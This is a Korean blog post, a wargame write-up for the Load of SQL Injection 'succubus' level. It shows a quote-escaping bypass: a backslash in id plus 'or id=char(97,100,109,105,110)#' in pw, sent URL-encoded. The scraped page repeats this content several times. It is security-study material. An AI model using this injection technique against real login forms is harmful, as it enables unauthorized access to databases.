[Load of SQL Injection] succubus

보안 공부/Load of SQL injection

[Load of SQL Injection] succubus

sh1256 2022. 1. 29. 23:36

728x90

1. 필터링

prob _ . () 처음에 \(\)를 \\뜻으로 보고 1시간 넘게 못 풀었던...ㅜㅠ 이런 실수는 하지 맙시다 ㅎ

where id='\' and pw='or 1#' --> where id='\' and pw='or 1#'

--> 특수문자 앞에 '\'를 붙이면 특수문자는 문자로 취급한다.

이 점을 이용해서 공격 시도!

select id from prob_succubus where id='\' and pw='or id=char(97,100,109,105,110)#'

< #은 %23으로 URLencoding 해서 보낸다. >

URL + ?id=\&&pw=or id=char(97,100,109,105,110)%23

성공!

저작자표시 비영리 변경금지

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

[Load of SQL Injection] nightmare (0)	2022.01.30
[Load of SQL Injection] zombie assassin (0)	2022.01.30
[Load of SQL Injection] Assassin(SQL like wildkard) (0)	2022.01.29
[Load of SQL Injection] Giant (공백 문자 우회 방법 모음) (0)	2022.01.28
[Load of SQL Injection] bugbear (0)	2022.01.28

현재글[Load of SQL Injection] succubus

SQL, webhacking.kr, 개발공부, 웹해킹, 보안, 백준, 키전수조사, 보안공부, 해킹공부, 유클리드 알고리즘 코딩, sqlInjection, 유클리드 확장 알고리즘 코딩, webhacking.kr44, 해킹, 유클리드확장알고리즘, IT공부, 현대암호, LoadofSQLinjection, It, 웹해킹공부,

Today :
Yesterday :

일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

살아가는 이야기

[Load of SQL Injection] succubus

1. 필터링

where id='\' and pw='or 1#' --> where id='\' and pw='or 1#'

select id from prob_succubus where id='\' and pw='or id=char(97,100,109,105,110)#'

select id from prob_succubus where id='\' and pw='or id=char(97,100,109,105,110)#'

URL + ?id=\&&pw=or id=char(97,100,109,105,110)%23

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

'보안 공부/Load of SQL injection'의 다른글

티스토리툴바

[Load of SQL Injection] succubus

1. 필터링

where id='\' and pw='or 1#' --> where id='\' and pw='or 1#'

select id from prob_succubus where id='\' and pw='or id=char(97,100,109,105,110)#'

select id from prob_succubus where id='\' and pw='or id=char(97,100,109,105,110)#'

URL + ?id=\&&pw=or id=char(97,100,109,105,110)%23

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

'보안 공부/Load of SQL injection'의 다른글

관련글

티스토리툴바